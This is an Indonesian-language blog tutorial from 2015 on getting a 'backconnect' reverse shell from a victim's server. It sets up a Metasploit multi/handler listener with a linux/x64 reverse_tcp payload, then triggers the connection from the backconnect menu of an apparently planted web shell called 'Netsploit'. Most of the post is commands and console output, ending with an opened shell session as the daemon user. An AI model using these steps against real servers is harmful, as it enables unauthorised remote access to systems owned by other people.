Open top menu
Sunday, May 10, 2015

banyak cara untuk Backconnect, ada yang pakai netcat, weevely, dan kali ini saya akan share cara backconnect menggunakan Metasploit. Oke langsung saja ke tutorial nya .

Syarat : IP harus statis. Untuk IP dinamis akan gagal saat binding port nya soalnya.

Oke langsung ke praktik nya .

Buka terminal, masukkan command berikut :

jackwilder@system ~ % su -

root@system:~# msfconsole



Masukkan Command berikut :

msf > use exploit/multi/handler

msf exploit(handler) > set lhost  192.168.1.135 | untuk setting ip lokal kita

msf exploit(handler) > set lport 1337 | port yang akan digunakan untuk listening



Setelah itu kita lihat sevver OS pada korban, berhubung dia mengunakan 64bit, kita masukkan command

msf exploit(handler) > set payload linux/x64/shell/reverse_tcp

msf exploit(handler) > exploit



[*] Started reverse handler on 192.168.1.135:1337

[*] Starting the payload handler...








Setelah itu masuk ke shell kita.


Masuk menu Netsploit , pada menu backconnect masukkan ip lokal kita, dan port yang kita gunakan untuk listening.


Lalu klik connect





Now script try connect to 192.168.1.135 port 1337 ...



Balik lagi ke terminal kita.

[*] Started reverse handler on 192.168.1.135:1337 

[*] Starting the payload handler...

[*] Sending stage (38 bytes) to 192.168.1.135

[*] Command shell session 2 opened (192.168.1.135:1337 -> 192.168.1.135:38718) at 2015-05-10 22:24:47 +0700



Linux system 4.0.0-040000-generic #201504121935 SMP Sun Apr 12 23:36:33 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

uid=1(daemon) gid=1(daemon) groups=1(daemon)







Backconnect


Sekian tutor kali ini, semoga bermanfaat.

Different Themes
Written by Kcnewbie

Ikatlah ilmu dengan menuliskanya.

0 comments